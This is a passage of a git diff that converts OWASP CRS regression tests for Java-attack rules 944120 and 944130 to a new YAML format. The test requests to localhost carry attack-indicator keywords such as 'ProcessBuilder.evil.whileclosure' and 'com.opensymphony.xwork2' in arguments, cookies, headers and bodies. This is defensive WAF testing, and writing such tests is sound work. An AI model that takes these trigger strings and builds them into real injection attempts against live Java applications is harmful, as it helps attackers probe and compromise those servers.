"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: 
- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"test": "ProcessBuilder.evil.whileclosure"} 
- output: - log_contains: "id \"944120\"" - - test_title: 944120-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log: + expect_ids: [944120] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"ProcessBuilder.evil.whileclosure": "test"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log: + expect_ids: [944120] + - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; 
name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + 
-----------------------------thisissparta-- + output: + log: + expect_ids: [944120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 163bba932..b08f7b265 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml 
@@ -1,8481 +1,8479 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944130.yaml" - description: "Positive tests for rule 944130" +rule_id: 944130 tests: - - test_title: 944130-1 + - test_id: 1 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log: + expect_ids: [944130] + - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - 
uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 10 desc: "Content-Type application/json 
arg value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log: + expect_ids: [944130] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
